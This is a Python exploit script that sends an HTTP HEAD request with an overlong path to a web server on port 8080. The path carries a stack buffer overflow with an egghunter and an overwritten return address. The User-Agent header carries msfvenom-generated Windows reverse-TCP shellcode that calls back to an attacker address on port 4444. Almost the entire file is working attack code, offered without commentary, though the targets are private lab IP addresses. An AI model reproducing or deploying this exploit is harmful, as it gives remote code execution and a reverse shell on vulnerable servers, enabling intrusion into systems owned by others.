#!/usr/bin/python
 
import socket
import os
import sys
import struct

#bad = x00\x20\x3f
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e"
"\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74") 

#payload msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.163 LPORT=4444 -e x86/alpha_mixed -f c
payload = ""
payload += ("\x89\xe1\xda\xc2\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x39\x6c\x49\x78\x4e\x62\x67\x70\x75\x50\x53\x30\x55\x30\x4f"
"\x79\x7a\x45\x54\x71\x4f\x30\x35\x34\x6e\x6b\x62\x70\x64\x70"
"\x4e\x6b\x73\x62\x64\x4c\x4c\x4b\x66\x32\x37\x64\x4e\x6b\x34"
"\x32\x55\x78\x34\x4f\x6d\x67\x33\x7a\x71\x36\x30\x31\x39\x6f"
"\x4e\x4c\x47\x4c\x73\x51\x43\x4c\x77\x72\x36\x4c\x37\x50\x39"
"\x51\x58\x4f\x56\x6d\x35\x51\x6f\x37\x4a\x42\x4a\x52\x43\x62"
"\x76\x37\x6c\x4b\x66\x32\x72\x30\x4e\x6b\x62\x6a\x47\x4c\x4c"
"\x4b\x30\x4c\x47\x61\x61\x68\x6b\x53\x67\x38\x56\x61\x78\x51"
"\x72\x71\x4e\x6b\x51\x49\x57\x50\x75\x51\x5a\x73\x4e\x6b\x43"
"\x79\x57\x68\x48\x63\x34\x7a\x52\x69\x6c\x4b\x36\x54\x6e\x6b"
"\x76\x61\x38\x56\x65\x61\x79\x6f\x6c\x6c\x6f\x31\x7a\x6f\x36"
"\x6d\x57\x71\x6b\x77\x46\x58\x6d\x30\x31\x65\x6a\x56\x43\x33"
"\x53\x4d\x38\x78\x35\x6b\x43\x4d\x76\x44\x62\x55\x4b\x54\x61"
"\x48\x4e\x6b\x61\x48\x55\x74\x36\x61\x4e\x33\x55\x36\x6c\x4b"
"\x74\x4c\x70\x4b\x4e\x6b\x71\x48\x37\x6c\x77\x71\x7a\x73\x4e"
"\x6b\x45\x54\x6c\x4b\x76\x61\x78\x50\x4f\x79\x70\x44\x35\x74"
"\x45\x74\x61\x4b\x61\x4b\x50\x61\x50\x59\x61\x4a\x56\x31\x39"
"\x6f\x4b\x50\x73\x6f\x53\x6f\x31\x4a\x6e\x6b\x42\x32\x6a\x4b"
"\x4c\x4d\x51\x4d\x72\x48\x57\x43\x74\x72\x55\x50\x35\x50\x62"
"\x48\x52\x57\x62\x53\x66\x52\x63\x6f\x56\x34\x45\x38\x70\x4c"
"\x74\x37\x61\x36\x46\x67\x4d\x59\x7a\x48\x59\x6f\x4e\x30\x78"
"\x38\x6a\x30\x65\x51\x45\x50\x53\x30\x75\x79\x68\x44\x56\x34"
"\x56\x30\x43\x58\x47\x59\x4f\x70\x50\x6b\x67\x70\x39\x6f\x38"
"\x55\x32\x4a\x76\x6a\x72\x48\x59\x50\x39\x38\x76\x61\x79\x33"
"\x65\x38\x65\x52\x77\x70\x62\x31\x63\x6c\x6d\x59\x6b\x56\x36"
"\x30\x32\x70\x72\x70\x52\x70\x53\x70\x66\x30\x37\x30\x52\x70"
"\x62\x48\x7a\x4a\x34\x4f\x6b\x6f\x6b\x50\x79\x6f\x7a\x75\x6f"
"\x67\x50\x6a\x54\x50\x61\x46\x36\x37\x43\x58\x4c\x59\x6c\x65"
"\x31\x64\x35\x31\x69\x6f\x49\x45\x4b\x35\x49\x50\x43\x44\x35"
"\x5a\x6b\x4f\x50\x4e\x33\x38\x62\x55\x78\x6c\x68\x68\x30\x67"
"\x57\x70\x43\x30\x45\x50\x33\x5a\x57\x70\x73\x5a\x66\x64\x61"
"\x46\x52\x77\x52\x48\x34\x42\x38\x59\x7a\x68\x43\x6f\x4b\x4f"
"\x6a\x75\x6e\x63\x4c\x38\x77\x70\x63\x4e\x50\x36\x6c\x4b\x45"
"\x66\x63\x5a\x73\x70\x71\x78\x47\x70\x32\x30\x73\x30\x65\x50"
"\x51\x46\x63\x5a\x43\x30\x63\x58\x73\x68\x6e\x44\x71\x43\x48"
"\x65\x39\x6f\x58\x55\x4d\x43\x76\x33\x30\x6a\x73\x30\x63\x66"
"\x72\x73\x43\x67\x61\x78\x67\x72\x49\x49\x68\x48\x73\x6f\x6b"
"\x4f\x49\x45\x4c\x43\x6c\x38\x45\x50\x61\x6d\x35\x78\x50\x58"
"\x55\x38\x55\x50\x31\x50\x63\x30\x75\x50\x32\x4a\x37\x70\x36"
"\x30\x61\x78\x44\x4b\x54\x6f\x66\x6f\x36\x50\x4b\x4f\x68\x55"
"\x46\x37\x43\x58\x30\x75\x32\x4e\x62\x6d\x43\x51\x6b\x4f\x38"
"\x55\x31\x4e\x31\x4e\x39\x6f\x76\x6c\x54\x64\x36\x6f\x6c\x45"
"\x54\x30\x59\x6f\x6b\x4f\x6b\x4f\x4a\x49\x6f\x6b\x69\x6f\x59"
"\x6f\x69\x6f\x76\x61\x6b\x73\x66\x49\x7a\x66\x44\x35\x6a\x61"
"\x5a\x63\x4f\x4b\x6c\x30\x48\x35\x4f\x52\x32\x76\x70\x6a\x63"
"\x30\x72\x73\x79\x6f\x6b\x65\x41\x41")


hunter = ""
hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x62\x33\x33\x66\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

Stage1 = ""
Stage1 = "A"*478 + hunter + "A"*5 + struct.pack("<L",0x77c35459) + "\xEB\xC4"
#Stage1 = "A" * (600-len(badchars)) + badchars
Stage2 = "b33fb33f" + payload


buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 192.168.1.252:8080\r\n"
"User-Agent: " + Stage2 + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
 
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("192.168.1.189", 8080))
expl.send(buffer)
print len(Stage1)
expl.close()